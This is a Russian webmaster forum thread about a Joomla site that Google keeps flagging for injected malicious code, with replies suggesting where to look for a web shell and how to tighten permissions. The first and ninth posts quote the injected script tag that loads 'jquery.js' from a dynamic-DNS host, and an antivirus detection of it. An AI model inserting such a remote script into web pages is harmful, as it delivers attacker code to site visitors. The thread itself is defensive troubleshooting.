Google обнаружил вредоносный код на вашем сайте

12
alinz
На сайте с 10.01.2010
Offline
104
2334

Периодически в панели гугл вебмастер приходят сообщения о вирусе на сайте, в коде ничего нет, после подачи на пересмотр вирус пропадает, но появляется опять через пару дней.

Сайт - джумла 2.5.14, все модули обновленные, права на папки 755, файлы - 644, конфик - 444, пароли от фтп не храню в клиенте, антивирус кис2013 лицензия, хостинг - выделенный сервер (http://www.hetzner.de).

Возможный внедренный код:

<script type="text/javascript" src="//rdomn1381941004.noip.m

e/jquery.js?1381941106">

На других аккаунтах на хостинге тоже периодические появляются записи о вирусах на сайтах, движки сайтов разные, вордпресс, друпал, джумла.

Что делать с сайтом, куда копать ?

K5
На сайте с 21.07.2010
Offline
209
#1

покажите сайт для начала/примера

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
alinz
На сайте с 10.01.2010
Offline
104
#2
draff
На сайте с 30.03.2010
Offline
65
#3

Регистрация запрещена на Джумла?

Отключи curl,

права -запрет на запись 555/444, ну если нужно откроешь для необходимых типа /cache , и понаблюдай.

Удалю вирус с сайта Джумла! (http://joomlaforum.ru/index.php/topic,254903.0.html)
alinz
На сайте с 10.01.2010
Offline
104
#4

Рега запрещена, curl отключить - модули перестануть работать, права нормальные же, зачем ставить 555

R
На сайте с 24.01.2008
Offline
180
#5
alinz:
Периодически в панели гугл вебмастер приходят сообщения о вирусе на сайте, в коде ничего нет, после подачи на пересмотр вирус пропадает, но появляется опять через пару дней.

ТС,. вирус может показываться 1 раз в сутки, потому возможно робот гугла то видит, то нет сам вирус, вам необходимо полностью проверить рабочий код сайта.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
draff
На сайте с 30.03.2010
Offline
65
#6
alinz:
curl отключить - модули перестануть работать, права нормальные же, зачем ставить 555

А зачем программе,запускающей пхп, права на запись во все файлы ?

а 555, чтобы проверить - может хостинг взломан, и запись в файл от root.

Обновление без curl не будет работать. Ну решить Вам.

alinz
На сайте с 10.01.2010
Offline
104
#7
draff:
А зачем программе,запускающей пхп, права на запись во все файлы ?
а 555, чтобы проверить - может хостинг взломан, и запись в файл от root.
Обновление без curl не будет работать. Ну решить Вам.

Хм, попробую.

WO
На сайте с 17.10.2013
Offline
1
#8
Rxp:
ТС,. вирус может показываться 1 раз в сутки, потому возможно робот гугла то видит, то нет сам вирус, вам необходимо полностью проверить рабочий код сайта.

Легко сказать у меня на одном сервере было 9 сайтов и 7 из них на Джумле правда разных версий, в один прекрасный день на один из новостников пошел не плохой траф с поисковиков, через некоторое время на нем завелись "глисты" дня через 4 яндекс начал матерится на все сайты которые были на джумле, обновление движка не помогало, как только переехала к другому хостеру и в ручную за месяц перелопатила код, все наладилось, сейчас слава богу все нормально, но месяц бессонных ночей :(

alinz
На сайте с 10.01.2010
Offline
104
#9

Вчера поставил права 777 на папку темп, логс и vmfiles для виртуамарта. Сегодня утром перед закрывающимся head строчка с вирусом, каспер написал "Обнаружено: HEUR:Trojan.Script.Iframer 20.10.2013 10:54:04 http://rdomn1382255103.hopto.me/jquery.js?1382255205// ". Очистил устаревший кеш, вирус пропал.

Где его искать до сих пор непонятно.

temniy
На сайте с 15.03.2008
Offline
235
#10

100% на сайте есть шелл

1) Проверьте все файлы .htaccess

По большому счету он на сайте должен быть один в корне. (содержание проверьте)

2) Проверьте файл configuration.php - в нем может быть прописан код шелла

3) Проверьте наличие посторонних файлов, в первую очередь в корне, в паgках tmp, cache, images, media и всех вложенных

4) проверьте папки плагинов редакторов, часто шелл маскируют под php файл с названием редактора где-нибудь в глубине папок.

Если есть возможность - проще всего скачать сайт на локальный комп и прогнать по нему антивирус.

Каспер не люблю, но бесплатная авира находит шеллы на раз-два.

⭐ Лучший хостинг от 4 евро, VPS от 6 евро, VPN недорого - разные локации - любые карты - скидки до 20% - https://fornex.com/c/ffi2e3/ru/services/
12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий